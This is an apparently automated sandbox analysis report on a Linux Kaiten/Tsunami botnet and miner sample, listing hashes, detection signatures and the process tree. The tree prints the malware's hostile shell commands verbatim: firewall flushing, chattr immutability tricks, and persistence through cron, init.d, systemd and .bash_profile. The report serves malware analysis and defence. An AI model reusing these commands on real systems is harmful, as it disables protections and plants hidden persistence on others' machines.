Analysis
-
max time kernel
149s -
max time network
151s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240221-en -
resource tags
-
submitted
14-03-2024 01:44
General
-
Target
f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf
-
Size
3.9MB
-
MD5
426155ff2d5a20f7164da55ff23cc94b
-
SHA1
71f5f60479f21702145008bb98c108a69ba8f34c
-
SHA256
f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712
-
SHA512
ae3c2dd95640d64a971a95af8a8aaf1effd150b0f8a37c46f902c991a66686c56210c8f2cf6ea00daa31c52731de6df2c4169b9279d387775b9d6c9739ecdc0b
-
SSDEEP
98304:7CuSt95TW1PvY22pKm2lGEhL4uQEMAlj664cLa1:7CuSt954A2WhcfRQrUUv1
Score
10/10
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 10 IoCs
-
Detects Kaiten/Tsunami payload 10 IoCs
-
Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
-
Executes dropped EXE 33 IoCs
-
Flushes firewall rules 64 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
-
Loads a kernel module 1 IoCs
Loads a Linux kernel module, potentially to achieve persistence
-
Reads EFI boot settings 64 IoCs
Reads EFI boot settings from the efivars filesystem, may contain security secrets or sensitive data.
-
UPX packed file 9 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Checks CPU configuration 1 TTPs 62 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Checks hardware identifiers (DMI) 1 TTPs 64 IoCs
Checks DMI information which indicate if the system is a virtual machine.
-
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies init.d 1 TTPs 22 IoCs
Adds/modifies system service, likely for persistence.
-
Modifies systemd 1 TTPs 17 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
-
Reads CPU attributes 1 TTPs 64 IoCs
-
Reads hardware information 1 TTPs 64 IoCs
Accesses system info like serial numbers, manufacturer names etc.
-
Writes file to system bin folder 1 TTPs 42 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 35 IoCs
Malware often drops required files in the /tmp directory.
-
GoLang User-Agent 5 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes
-
/tmp/f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf/tmp/f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf1⤵
- Creates/modifies Cron job
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Writes file to tmp directory
-
/usr/bin/bashbash -c "ufw disable"2⤵
-
/usr/sbin/ufwufw disable2⤵
-
/usr/sbin/iptables/usr/sbin/iptables -V3⤵
-
/lib/ufw/ufw-init/lib/ufw/ufw-init force-stop3⤵
-
/sbin/ip6tablesip6tables -L INPUT -n4⤵
-
/sbin/modprobe/sbin/modprobe ip6_tables5⤵
- Loads a kernel module
-
/sbin/iptablesiptables -F ufw-logging-deny4⤵
-
/sbin/iptablesiptables -F ufw-logging-allow4⤵
-
/sbin/iptablesiptables -F ufw-not-local4⤵
-
/sbin/iptablesiptables -F ufw-user-logging-input4⤵
-
/sbin/iptablesiptables -F ufw-user-limit-accept4⤵
-
/sbin/iptablesiptables -F ufw-user-limit4⤵
-
/sbin/iptablesiptables -F ufw-skip-to-policy-input4⤵
-
/sbin/iptablesiptables -F ufw-reject-input4⤵
-
/sbin/iptablesiptables -F ufw-after-logging-input4⤵
-
/sbin/iptablesiptables -F ufw-after-input4⤵
-
/sbin/iptablesiptables -F ufw-user-input4⤵
-
/sbin/iptablesiptables -F ufw-before-input4⤵
-
/sbin/iptablesiptables -F ufw-before-logging-input4⤵
-
/sbin/iptablesiptables -F ufw-skip-to-policy-forward4⤵
-
/sbin/iptablesiptables -F ufw-reject-forward4⤵
-
/sbin/iptablesiptables -F ufw-after-logging-forward4⤵
-
/sbin/iptablesiptables -F ufw-after-forward4⤵
-
/sbin/iptablesiptables -F ufw-user-logging-forward4⤵
-
/sbin/iptablesiptables -F ufw-user-forward4⤵
-
/sbin/iptablesiptables -F ufw-before-forward4⤵
-
/sbin/iptablesiptables -F ufw-before-logging-forward4⤵
-
/sbin/iptablesiptables -F ufw-track-forward4⤵
-
/sbin/iptablesiptables -F ufw-track-output4⤵
-
/sbin/iptablesiptables -F ufw-track-input4⤵
-
/sbin/iptablesiptables -F ufw-skip-to-policy-output4⤵
-
/sbin/iptablesiptables -F ufw-reject-output4⤵
-
/sbin/iptablesiptables -F ufw-after-logging-output4⤵
-
/sbin/iptablesiptables -F ufw-after-output4⤵
-
/sbin/iptablesiptables -F ufw-user-logging-output4⤵
-
/sbin/iptablesiptables -F ufw-user-output4⤵
-
/sbin/iptablesiptables -F ufw-before-output4⤵
-
/sbin/iptablesiptables -F ufw-before-logging-output4⤵
-
/sbin/iptablesiptables -Z ufw-logging-deny4⤵
-
/sbin/iptablesiptables -Z ufw-logging-allow4⤵
-
/sbin/iptablesiptables -Z ufw-not-local4⤵
-
/sbin/iptablesiptables -Z ufw-user-logging-input4⤵
-
/sbin/iptablesiptables -Z ufw-user-limit-accept4⤵
-
/sbin/iptablesiptables -Z ufw-user-limit4⤵
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-input4⤵
-
/sbin/iptablesiptables -Z ufw-reject-input4⤵
-
/sbin/iptablesiptables -Z ufw-after-logging-input4⤵
-
/sbin/iptablesiptables -Z ufw-after-input4⤵
-
/sbin/iptablesiptables -Z ufw-user-input4⤵
-
/sbin/iptablesiptables -Z ufw-before-input4⤵
-
/sbin/iptablesiptables -Z ufw-before-logging-input4⤵
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-forward4⤵
-
/sbin/iptablesiptables -Z ufw-reject-forward4⤵
-
/sbin/iptablesiptables -Z ufw-after-logging-forward4⤵
-
/sbin/iptablesiptables -Z ufw-after-forward4⤵
-
/sbin/iptablesiptables -Z ufw-user-logging-forward4⤵
-
/sbin/iptablesiptables -Z ufw-user-forward4⤵
-
/sbin/iptablesiptables -Z ufw-before-forward4⤵
-
/sbin/iptablesiptables -Z ufw-before-logging-forward4⤵
-
/sbin/iptablesiptables -Z ufw-track-forward4⤵
-
/sbin/iptablesiptables -Z ufw-track-output4⤵
-
/sbin/iptablesiptables -Z ufw-track-input4⤵
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-output4⤵
-
/sbin/iptablesiptables -Z ufw-reject-output4⤵
-
/sbin/iptablesiptables -Z ufw-after-logging-output4⤵
-
/sbin/iptablesiptables -Z ufw-after-output4⤵
-
/sbin/iptablesiptables -Z ufw-user-logging-output4⤵
-
/sbin/iptablesiptables -Z ufw-user-output4⤵
-
/sbin/iptablesiptables -Z ufw-before-output4⤵
-
/sbin/iptablesiptables -Z ufw-before-logging-output4⤵
-
/sbin/iptablesiptables -X ufw-logging-deny4⤵
-
/sbin/iptablesiptables -X ufw-logging-allow4⤵
-
/sbin/iptablesiptables -X ufw-not-local4⤵
-
/sbin/iptablesiptables -X ufw-user-logging-input4⤵
-
/sbin/iptablesiptables -X ufw-user-logging-output4⤵
-
/sbin/iptablesiptables -X ufw-user-logging-forward4⤵
-
/sbin/iptablesiptables -X ufw-user-limit-accept4⤵
-
/sbin/iptablesiptables -X ufw-user-limit4⤵
-
/sbin/iptablesiptables -X ufw-user-input4⤵
-
/sbin/iptablesiptables -X ufw-user-forward4⤵
-
/sbin/iptablesiptables -X ufw-user-output4⤵
-
/sbin/iptablesiptables -X ufw-skip-to-policy-input4⤵
-
/sbin/iptablesiptables -X ufw-skip-to-policy-output4⤵
-
/sbin/iptablesiptables -X ufw-skip-to-policy-forward4⤵
-
/sbin/iptablesiptables -P INPUT ACCEPT4⤵
-
/sbin/iptablesiptables -P OUTPUT ACCEPT4⤵
-
/sbin/iptablesiptables -P FORWARD ACCEPT4⤵
-
/sbin/ip6tablesip6tables -F ufw6-logging-deny4⤵
-
/sbin/ip6tablesip6tables -F ufw6-logging-allow4⤵
-
/sbin/ip6tablesip6tables -F ufw6-not-local4⤵
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-input4⤵
-
/sbin/ip6tablesip6tables -F ufw6-user-limit-accept4⤵
-
/sbin/ip6tablesip6tables -F ufw6-user-limit4⤵
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-input4⤵
-
/sbin/ip6tablesip6tables -F ufw6-reject-input4⤵
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-input4⤵
-
/sbin/ip6tablesip6tables -F ufw6-after-input4⤵
-
/sbin/ip6tablesip6tables -F ufw6-user-input4⤵
-
/sbin/ip6tablesip6tables -F ufw6-before-input4⤵
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-input4⤵
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-forward4⤵
-
/sbin/ip6tablesip6tables -F ufw6-reject-forward4⤵
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-forward4⤵
-
/sbin/ip6tablesip6tables -F ufw6-after-forward4⤵
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-forward4⤵
-
/sbin/ip6tablesip6tables -F ufw6-user-forward4⤵
-
/sbin/ip6tablesip6tables -F ufw6-before-forward4⤵
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-forward4⤵
-
/sbin/ip6tablesip6tables -F ufw6-track-forward4⤵
-
/sbin/ip6tablesip6tables -F ufw6-track-output4⤵
-
/sbin/ip6tablesip6tables -F ufw6-track-input4⤵
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-output4⤵
-
/sbin/ip6tablesip6tables -F ufw6-reject-output4⤵
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-output4⤵
-
/sbin/ip6tablesip6tables -F ufw6-after-output4⤵
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-output4⤵
-
/sbin/ip6tablesip6tables -F ufw6-user-output4⤵
-
/sbin/ip6tablesip6tables -F ufw6-before-output4⤵
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-output4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-logging-deny4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-logging-allow4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-not-local4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-input4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit-accept4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-input4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-reject-input4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-input4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-after-input4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-user-input4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-before-input4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-input4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-forward4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-reject-forward4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-forward4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-after-forward4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-forward4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-user-forward4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-before-forward4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-forward4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-track-forward4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-track-output4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-track-input4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-output4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-reject-output4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-output4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-after-output4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-output4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-user-output4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-before-output4⤵
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-output4⤵
-
/sbin/ip6tablesip6tables -X ufw6-logging-deny4⤵
-
/sbin/ip6tablesip6tables -X ufw6-logging-allow4⤵
-
/sbin/ip6tablesip6tables -X ufw6-not-local4⤵
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-input4⤵
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-output4⤵
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-forward4⤵
-
/sbin/ip6tablesip6tables -X ufw6-user-limit-accept4⤵
-
/sbin/ip6tablesip6tables -X ufw6-user-limit4⤵
-
/sbin/ip6tablesip6tables -X ufw6-user-input4⤵
-
/sbin/ip6tablesip6tables -X ufw6-user-forward4⤵
-
/sbin/ip6tablesip6tables -X ufw6-user-output4⤵
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-input4⤵
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-output4⤵
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-forward4⤵
-
/sbin/ip6tablesip6tables -P INPUT ACCEPT4⤵
-
/sbin/ip6tablesip6tables -P OUTPUT ACCEPT4⤵
-
/sbin/ip6tablesip6tables -P FORWARD ACCEPT4⤵
-
/usr/bin/bashbash -c "iptables -P INPUT ACCEPT"2⤵
-
/usr/sbin/iptablesiptables -P INPUT ACCEPT2⤵
-
/usr/bin/bashbash -c "iptables -P OUTPUT ACCEPT"2⤵
-
/usr/sbin/iptablesiptables -P OUTPUT ACCEPT2⤵
-
/usr/bin/bashbash -c "iptables -P FORWARD ACCEPT"2⤵
-
/usr/sbin/iptablesiptables -P FORWARD ACCEPT2⤵
-
/usr/bin/bashbash -c "iptables -F"2⤵
-
/usr/sbin/iptablesiptables -F2⤵
-
/usr/bin/bashbash -c "chattr -ia /etc/ld.so.preload"2⤵
-
/usr/bin/chattrchattr -ia /etc/ld.so.preload2⤵
-
/usr/bin/pgreppgrep -f klibsystem42⤵
- Reads runtime system information
-
/usr/bin/pgreppgrep -f klibsystem52⤵
-
/usr/bin/chattrchattr +ia /etc/init.d/knlib2⤵
-
/etc/init.d/knlib/etc/init.d/knlib start2⤵
- Executes dropped EXE
-
/usr/bin/cpcp -f -r -- /bin/knlib5 /bin/klibsystem53⤵
-
/usr/bin/rmrm -rf -- klibsystem53⤵
-
/usr/bin/nohupnohup ./klibsystem53⤵
-
/usr/bin/chattrchattr +ia /etc/systemd/system/knlibe.service2⤵
-
/usr/bin/systemctlsystemctl daemon-reload2⤵
- Reads EFI boot settings
-
/usr/bin/systemctlsystemctl enable knlibe.service2⤵
- Reads EFI boot settings
-
/usr/bin/chattrchattr +ia /bin/knlib52⤵
-
/usr/bin/crontabcrontab -r2⤵
-
/usr/bin/pkillpkill -f .klibsystem52⤵
- Reads runtime system information
-
/usr/bin/pkillpkill -f .klibsystem42⤵
- Reads runtime system information
-
/usr/bin/bashbash -c "echo \"* * * * * /opt/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵
-
/usr/bin/crontabcrontab -3⤵
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib42⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib42⤵
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib42⤵
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib42⤵
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib42⤵
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib42⤵
-
/usr/bin/chattrchattr -ia /etc/anacrontab2⤵
-
/usr/bin/chattrchattr +ia /etc/anacrontab2⤵
-
/tmp/sys-helper/tmp/sys-helper2⤵
- Executes dropped EXE
- Writes file to tmp directory
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
-
/usr/bin/whoamiwhoami4⤵
-
/usr/bin/hostnamehostname4⤵
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵
-
/usr/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/idid -u4⤵
-
/usr/bin/grepgrep -v grep4⤵
-
/usr/bin/grepgrep /etc/cron4⤵
-
/usr/bin/psps x4⤵
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- Attempts to change immutable files
- Writes file to tmp directory
-
/usr/bin/idid -u4⤵
-
/usr/bin/idid -u4⤵
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵
-
/usr/bin/rmrm -rf /bin/bprofr4⤵
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
-
/usr/bin/idid -u4⤵
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵
-
/usr/bin/chattrchattr -i -a "/etc/cron.*/pwnrig" /bin/crondr4⤵
-
/usr/bin/rmrm -rf /bin/crondr4⤵
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
-
/usr/bin/whichwhich chkconfig4⤵
-
/usr/bin/whichwhich update-rc.d4⤵
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
-
/usr/bin/rmrm -rf /bin/initdr4⤵
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Modifies init.d
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵
-
/usr/local/sbin/systemctlsystemctl --quiet enable pwnrig5⤵
-
/usr/local/bin/systemctlsystemctl --quiet enable pwnrig5⤵
-
/usr/sbin/systemctlsystemctl --quiet enable pwnrig5⤵
-
/usr/bin/systemctlsystemctl --quiet enable pwnrig5⤵
- Reads EFI boot settings
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
